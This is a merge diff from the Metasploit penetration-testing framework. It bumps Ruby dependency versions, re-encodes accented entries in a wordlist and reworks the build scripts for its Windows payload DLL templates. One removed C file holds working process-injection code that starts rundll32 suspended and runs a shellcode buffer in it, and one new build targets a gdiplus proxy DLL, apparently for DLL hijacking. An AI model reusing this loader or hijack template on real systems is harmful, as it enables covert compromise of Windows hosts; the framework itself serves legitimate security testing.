Land #17774 , Fix undefined method word_wrap error on msfconsole boot

Land #17773 , Fix kerberos tests failing in different timezones
Fix undefiend method word_wrap error on msfconsole boot
2023-03-13 13:00:06 -05:00 · 2023-03-13 17:42:26 +00:00 · 2023-03-13 17:24:57 +00:00 · 2023-03-13 13:16:12 -04:00 · 2023-03-13 11:52:26 -05:00 · 2023-03-13 16:30:05 +00:00
157 changed files with 8101 additions and 1893 deletions
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.2)
+    metasploit-framework (6.3.7)
      actionpack (~> 7.0)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -11,6 +11,7 @@ PATH
      bcrypt
      bcrypt_pbkdf
      bson
+      chunky_png
      dnsruby
      ed25519
      em-http-request
@@ -29,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.108)
+      metasploit-payloads (= 2.0.122)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -127,22 +128,22 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.707.0)
+    aws-partitions (1.722.0)
    aws-sdk-core (3.170.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.364.0)
+    aws-sdk-ec2 (1.368.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.75.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.62.0)
+    aws-sdk-kms (1.63.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.119.0)
+    aws-sdk-s3 (1.119.1)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -154,8 +155,9 @@ GEM
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
+    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.0)
+    concurrent-ruby (1.2.2)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
@@ -190,7 +192,7 @@ GEM
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.0.0)
+    faraday-retry (2.1.0)
      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
@@ -215,7 +217,7 @@ GEM
    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.6.0)
-    irb (1.6.2)
+    irb (1.6.3)
      reline (>= 0.3.0)
    jmespath (1.6.2)
    jsobfu (0.4.2)
@@ -249,7 +251,7 @@ GEM
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
-    metasploit-payloads (2.0.108)
+    metasploit-payloads (2.0.122)
    metasploit_data_models (6.0.2)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -263,9 +265,9 @@ GEM
    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.1)
-    minitest (5.17.0)
-    mqtt (0.5.0)
-    msgpack (1.6.0)
+    minitest (5.18.0)
+    mqtt (0.6.0)
+    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
@@ -279,7 +281,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.14.1)
+    nokogiri (1.14.2)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -292,7 +294,7 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.2.0.0)
+    parser (3.2.1.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -302,7 +304,7 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.5)
+    pg (1.4.6)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
@@ -310,10 +312,10 @@ GEM
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
    public_suffix (5.0.1)
-    puma (6.0.2)
+    puma (6.1.1)
      nio4r (~> 2.0)
    racc (1.6.2)
-    rack (2.2.6.2)
+    rack (2.2.6.3)
    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
@@ -338,7 +340,7 @@ GEM
    recog (3.0.3)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.6.2)
+    regexp_parser (2.7.0)
    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -354,7 +356,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.37)
+    rex-exploitation (0.1.38)
      jsobfu
      metasm
      rex-arch
@@ -386,7 +388,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.49)
+    rex-text (0.2.50)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -414,24 +416,24 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.44.1)
+    rubocop (1.48.0)
      json (~> 2.3)
      parallel (~> 1.10)
      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.24.1, < 2.0)
+      rubocop-ast (>= 1.26.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.24.1)
-      parser (>= 3.1.1.0)
+    rubocop-ast (1.27.0)
+      parser (>= 3.2.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
+    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.4)
+    ruby_smb (3.2.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -453,7 +455,7 @@ GEM
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.6.0)
+    sqlite3 (1.6.1)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    strptime (0.2.5)
@@ -463,9 +465,9 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.11)
+    tilt (2.1.0)
    timecop (0.9.6)
-    timeout (0.3.1)
+    timeout (0.3.2)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
@@ -500,7 +502,7 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.6.6)
+    zeitwerk (2.6.7)

 PLATFORMS
  ruby
@@ -10,22 +10,23 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.701.0, "Apache 2.0"
+aws-partitions, 1.722.0, "Apache 2.0"
 aws-sdk-core, 3.170.0, "Apache 2.0"
-aws-sdk-ec2, 1.362.0, "Apache 2.0"
-aws-sdk-iam, 1.74.0, "Apache 2.0"
-aws-sdk-kms, 1.62.0, "Apache 2.0"
-aws-sdk-s3, 1.119.0, "Apache 2.0"
+aws-sdk-ec2, 1.368.0, "Apache 2.0"
+aws-sdk-iam, 1.75.0, "Apache 2.0"
+aws-sdk-kms, 1.63.0, "Apache 2.0"
+aws-sdk-s3, 1.119.1, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.14, ruby
+bindata, 2.4.15, "Simplified BSD"
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
+chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.0, MIT
+concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
@@ -41,10 +42,10 @@ erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 3.1.0, MIT
+faker, 3.1.1, MIT
 faraday, 2.7.4, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.0.0, MIT
+faraday-retry, 2.1.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -59,7 +60,7 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
 io-console, 0.6.0, "ruby, Simplified BSD"
-irb, 1.6.2, "ruby, Simplified BSD"
+irb, 1.6.3, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
@@ -70,16 +71,16 @@ memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
 metasploit-credential, 6.0.2, "New BSD"
-metasploit-framework, 6.3.2, "New BSD"
+metasploit-framework, 6.3.7, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.122, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.1, MIT
-minitest, 5.17.0, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.6.0, "Apache 2.0"
+minitest, 5.18.0, MIT
+mqtt, 0.6.0, MIT
+msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
@@ -90,7 +91,7 @@ net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.14.1, MIT
+nokogiri, 1.14.2, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,17 +99,17 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.2.0.0, MIT
+parser, 3.2.1.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.4.5, "Simplified BSD"
+pg, 1.4.6, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.1, MIT
-puma, 6.0.2, "New BSD"
+puma, 6.1.1, "New BSD"
 racc, 1.6.2, "ruby, Simplified BSD"
-rack, 2.2.6.2, MIT
+rack, 2.2.6.3, MIT
 rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
@@ -120,13 +121,13 @@ rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.0.3, unknown
 redcarpet, 3.6.0, MIT
-regexp_parser, 2.6.2, MIT
+regexp_parser, 2.7.0, MIT
 reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.30, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.37, "New BSD"
+rex-exploitation, 0.1.38, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
@@ -135,28 +136,28 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.46, "New BSD"
+rex-socket, 0.1.47, "New BSD"
 rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.49, "New BSD"
+rex-text, 0.2.50, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
-rspec-core, 3.12.0, MIT
+rspec-core, 3.12.1, MIT
 rspec-expectations, 3.12.2, MIT
 rspec-mocks, 3.12.3, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.44.1, MIT
-rubocop-ast, 1.24.1, MIT
+rubocop, 1.48.0, MIT
+rubocop-ast, 1.27.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
+ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.4, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
@@ -164,15 +165,15 @@ simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
 sinatra, 3.0.5, MIT
-sqlite3, 1.6.0, "New BSD"
+sqlite3, 1.6.1, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.11, MIT
+tilt, 2.1.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.1, "ruby, Simplified BSD"
+timeout, 0.3.2, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2022.7, MIT
@@ -190,4 +191,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.6.6, MIT
+zeitwerk, 2.6.7, MIT
@@ -0,0 +1,10 @@
+# PE Source Code
+This directory contains the source code for the PE executable templates.
+
+## Building DLLs
+Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`pe`).
@@ -0,0 +1,7 @@
+@echo off
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  build.bat
+  popd
+)
@@ -3,12 +3,13 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
+rc /v template.rc
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
 %COMSPEC% /c "%0" x86
 %COMSPEC% /c "%0" x64
-del  *.obj
+del  *.obj *.res
 move *.dll ..\..\..
-
@@ -1,5 +1,6 @@
-
+#ifndef SCSIZE
 #define SCSIZE 4096
+#endif
 unsigned char code[SCSIZE] = "PAYLOAD:";
 char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
 char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,15 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rc /v /fo template.res ../dll/template.rc
+cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.exp *.lib *.res *.obj
+move *.dll ..\..\..
@@ -1,24 +0,0 @@
-#
-# XXX: NOTE: this will only compile the x86 version.
-#
-# To compile the x64 version, use:
-# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
-# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
-#
-
-if [ -z "$PREFIX" ]; then
-  PREFIX=i686-w64-mingw32 
-fi
-
-rm -f *.o *.dll
-$PREFIX-gcc -c template.c
-$PREFIX-windres -o rc.o template.rc
-$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
-rm -f junk.tmp
-$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
-rm -f base.tmp
-$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
-rm -f temp.exp
-
-$PREFIX-strip template_x86_windows.dll
-rm -f *.o
@@ -1,6 +1,3 @@
-#define SCSIZE 2048
-unsigned char code[SCSIZE] = "PAYLOAD:";
-
 #ifdef _MSC_VER
 	#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
 	#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
@@ -1,97 +0,0 @@
-#include <windows.h>
-#include "template.h"
-
-/* hand-rolled bzero allows us to avoid including ms vc runtime */
-void inline_bzero(void *p, size_t l)
-{
-
-           BYTE *q = (BYTE *)p;
-           size_t x = 0;
-           for (x = 0; x < l; x++)
-                     *(q++) = 0x00;
-}
-
-void ExecutePayload(void);
-
-BOOL WINAPI
-DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
-{
-    switch (dwReason)
-    {
-        case DLL_PROCESS_ATTACH:
-			ExecutePayload();
-            break;
-
-        case DLL_PROCESS_DETACH:
-            // Code to run when the DLL is freed
-            break;
-
-        case DLL_THREAD_ATTACH:
-            // Code to run when a thread is created during the DLL's lifetime
-            break;
-
-        case DLL_THREAD_DETACH:
-            // Code to run when a thread ends normally.
-            break;
-    }
-    return TRUE;
-}
-
-void ExecutePayload(void) {
-    int error;
-	PROCESS_INFORMATION pi;
-	STARTUPINFO si;
-	CONTEXT ctx;
-	DWORD prot;
-   LPVOID ep;
-
-	// Start up the payload in a new process
-	inline_bzero( &si, sizeof( si ));
-	si.cb = sizeof(si);
-
-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
-	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
-		GetThreadContext(pi.hThread, &ctx);
-
-	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
-        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
-
-#ifdef _WIN64
-	   ctx.Rip = (DWORD64)ep;
-#else
-	   ctx.Eip = (DWORD)ep;
-#endif
-
-        SetThreadContext(pi.hThread,&ctx);
-
-        ResumeThread(pi.hThread);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
-	}
-   // ExitProcess(0);
-   ExitThread(0);
-}
-
-/*
-typedef VOID
-(NTAPI *PIMAGE_TLS_CALLBACK) (
-    PVOID DllHandle,
-    ULONG Reason,
-    PVOID Reserved
-    );
-
-VOID NTAPI TlsCallback(
-      IN PVOID DllHandle,
-      IN ULONG Reason,
-      IN PVOID Reserved)
-{
-	__asm  ( "int3" );
-}
-
-ULONG _tls_index;
-PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
-IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
-*/
-
@@ -1,3 +0,0 @@
-EXPORTS
-DllMain@12
-
@@ -1,18 +0,0 @@
-
-LANGUAGE 9, 1
-
-
-VS_VERSION_INFO VERSIONINFO
- FILEVERSION 0,0,0,1
- PRODUCTVERSION 0,0,0,1
- FILEFLAGSMASK 0x17L
- FILEFLAGS 0x0L
- FILEOS 0x4L
- FILETYPE 0x2L
- FILESUBTYPE 0x0L
-BEGIN
-
-END
-
-#define RT_HTML  23
-
@@ -4,6 +4,7 @@ if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B

 :NO_ARGUMENTS
@@ -274,8 +274,8 @@ abbreviating
 abbreviation
 abby
 abbye
-abbé
-abbés
+abbé
+abbés
 abc
 abc123
 abcd
@@ -975,7 +975,7 @@ adipose
 adiposes
 adirondack
 adirondacks
-adiós
+adiós
 adj
 adjacency
 adjacent
@@ -1573,7 +1573,7 @@ aidan
 aide
 aide-de-camp
 aide-memoires
-aide-mémoire
+aide-mémoire
 aided
 aider
 aides-de-camp
@@ -3006,7 +3006,7 @@ animistic
 animized
 animosity
 animus
-animé
+animé
 anion
 anionic
 anise
@@ -3615,10 +3615,10 @@ applicator
 applier
 appliers
 applique
-appliqué
-appliquéd
-appliquéing
-appliqués
+appliqué
+appliquéd
+appliquéing
+appliqués
 apply
 appoint
 appointee
@@ -4274,8 +4274,8 @@ arvy
 aryan
 aryanism
 aryn
-arête
-arêtes
+arête
+arêtes
 as
 asa
 asama
@@ -4618,7 +4618,7 @@ asturias
 astute
 astuteness
 asuncion
-asunción
+asunción
 asunder
 aswan
 asyllabic
@@ -4643,7 +4643,7 @@ atalanta
 atamelang
 atari
 ataturk
-atatürk
+atatürk
 atavism
 atavist
 atavistic
@@ -4742,7 +4742,7 @@ attached
 attacher
 attaches
 attachment
-attaché
+attaché
 attack
 attackable
 attacker
@@ -6141,7 +6141,7 @@ bartolomeo
 barton
 bartram
 barty
-bartók
+bartók
 baruch
 barvale
 barvallen
@@ -7880,7 +7880,7 @@ blast
 blaster
 blasting
 blastoff
-blasé
+blasé
 blat
 blatancy
 blatant
@@ -8433,7 +8433,7 @@ bogotified
 bogotifies
 bogotify
 bogotifying
-bogotá
+bogotá
 bogus
 bogy
 bogyman
@@ -8911,7 +8911,7 @@ botulinum
 botulinus
 botulism
 boucher
-bouclé
+bouclé
 boudicca
 boudoir
 bouffant
@@ -8962,13 +8962,13 @@ bourne
 bournemouth
 bourree
 bourses
-bourée
+bourée
 boustrophedon
 bout
 boutique
 boutonniere
-boutonnière
-boutonnières
+boutonnière
+boutonnières
 bouvier
 bouzouki
 bovary
@@ -9052,7 +9052,7 @@ boyscout
 boysenberry
 boyup
 bozo
-boötes
+boötes
 bp
 bpi
 bpoe
@@ -9435,7 +9435,7 @@ bribery
 bribie
 bric
 bric-a-brac
-bric-à-brac
+bric-à-brac
 brice
 brick
 brick-red
@@ -10472,7 +10472,7 @@ buzzer
 buzzing
 buzzword
 buzzy
-buñuel
+buñuel
 bx
 bxs
 by
@@ -10528,10 +10528,10 @@ byway
 byword
 byzantine
 byzantium
-bêche
-bête
-bêtes
-bêtise
+bêche
+bête
+bêtes
+bêtise
 c
 c.elegans
 c.lit.
@@ -10646,8 +10646,8 @@ caffeinated
 caffeine
 caftan
 cafutweni
-café
-cafés
+café
+cafés
 cage
 caged
 cager
@@ -10962,8 +10962,8 @@ canalization
 canalize
 canalling
 canape
-canapé
-canapés
+canapé
+canapés
 canard
 canaries
 canary
@@ -13334,11 +13334,11 @@ chutzpahs
 chuvash
 chweni
 chyme
-château
-châteaus
-châteaux
-châtelaine
-châtelaines
+château
+châteaus
+châteaux
+châtelaine
+châtelaines
 ci
 cia
 ciao
@@ -13840,15 +13840,15 @@ clewer
 cliburn
 cliche
 cliched
-cliché
-clichéd
-clichés
+cliché
+clichéd
+clichés
 click
 clicker
 clicking
 client
 clientele
-clientèle
+clientèle
 cliff
 cliff-hanger
 cliffdale
@@ -13951,7 +13951,7 @@ clogged
 clogging
 cloisonne
 cloisonnes
-cloisonné
+cloisonné
 cloister
 cloistral
 clomp
@@ -14968,7 +14968,7 @@ communing
 communion
 communique
 communiques
-communiqué
+communiqué
 communise
 communism
 communist
@@ -15196,8 +15196,8 @@ computerize
 computes
 computicket
 computing
-compère
-compères
+compère
+compères
 comrade
 comradeliest
 comradeliness
@@ -15241,7 +15241,7 @@ concentrator
 concentric
 concentrically
 concepcion
-concepción
+concepción
 concept
 conception
 conceptional
@@ -15504,8 +15504,8 @@ confrontation
 confrontational
 confrontationally
 confronter
-confrère
-confrères
+confrère
+confrères
 confucian
 confucianism
 confucius
@@ -15755,8 +15755,8 @@ consolidation
 consolidator
 consoling
 consomme
-consommé
-consommés
+consommé
+consommés
 consonance
 consonances
 consonant
@@ -16539,8 +16539,8 @@ cortisone
 cortland
 cortney
 corty
-cortège
-cortèges
+cortège
+cortèges
 corundum
 coruscate
 coruscation
@@ -16657,8 +16657,8 @@ coulis
 coulomb
 coulter
 coulthard
-coulée
-coulées
+coulée
+coulées
 council
 councillor
 councilman
@@ -16791,7 +16791,7 @@ couples
 couplet
 coupling
 coupon
-coupé
+coupé
 cour
 courage
 courageous
@@ -17506,8 +17506,8 @@ crowning
 crows
 croydon
 crozier
-croûton
-croûtons
+croûton
+croûtons
 crt
 crucial
 cruciate
@@ -17526,7 +17526,7 @@ crude
 crudeness
 crudites
 crudity
-crudités
+crudités
 cruel
 cruelled
 cruelling
@@ -17634,12 +17634,12 @@ crystallographer
 crystallographic
 crystallography
 crystie
-crèche
-crèches
-crème
-crêpe
-crêpes
-crêpey
+crèche
+crèches
+crème
+crêpe
+crêpes
+crêpey
 cs
 csa
 cse
@@ -18113,7 +18113,7 @@ czechoslovakian
 czechs
 czerniak
 czerny
-côte
+côte
 d
 da
 daantjie
@@ -18299,7 +18299,7 @@ damson
 dan
 dana
 danarand
-danaë
+danaë
 danbury
 dance
 danceable
@@ -19951,8 +19951,8 @@ derrik
 derril
 derrinallum
 derringer
-derrière
-derrières
+derrière
+derrières
 derron
 derry
 dersley
@@ -20447,7 +20447,7 @@ diamagnetic
 diamante
 diamanthoogte
 diamantina
-diamanté
+diamanté
 diameter
 diametric
 diametrical
@@ -21077,8 +21077,8 @@ discordant
 discorporate
 discorporated
 discotheque
-discothèque
-discothèques
+discothèque
+discothèques
 discount
 discountability
 discountable
@@ -21613,9 +21613,9 @@ divisor
 divorce
 divorcee
 divorcement
-divorcé
-divorcée
-divorcées
+divorcé
+divorcée
+divorcées
 divot
 divulge
 divvy
@@ -22000,7 +22000,7 @@ dopiness
 dopinesses
 doping
 doppelganger
-doppelgänger
+doppelgänger
 doppies
 doppler
 dopy
@@ -22077,7 +22077,7 @@ dorthea
 dorthy
 dortmund
 dory
-doré
+doré
 dos
 dosage
 dose
@@ -22553,7 +22553,7 @@ drowse
 drowsily
 drowsiness
 drowsy
-droëwors
+droëwors
 dru
 drub
 drubbed
@@ -22948,7 +22948,7 @@ duynefontein
 dvd
 dvina
 dvorak
-dvorák
+dvorák
 dwaal
 dwaalboom
 dwain
@@ -23034,33 +23034,33 @@ dzimauli
 dzongkha
 dzumeri
 dzungaria
-début
-débutante
-débutantes
-débuts
-débâcle
-débâcles
-déclassé
-déclassée
-décolletage
-décolletages
-décolleté
-décolletée
-décor
-décors
-découpage
-déjà
-démodé
-dénouement
-dépaysé
-dépaysée
-dérailleur
-dérailleurs
-déshabillé
-détente
-détentes
-dürer
-düsseldorf
+début
+débutante
+débutantes
+débuts
+débâcle
+débâcles
+déclassé
+déclassée
+décolletage
+décolletages
+décolleté
+décolletée
+décor
+décors
+découpage
+déjà
+démodé
+dénouement
+dépaysé
+dépaysée
+dérailleur
+dérailleurs
+déshabillé
+détente
+détentes
+dürer
+düsseldorf
 e
 e-commerce
 e-mail
@@ -24137,7 +24137,7 @@ elysia
 elysian
 elysium
 elyssa
-elysée
+elysée
 em
 ema
 emabheleni
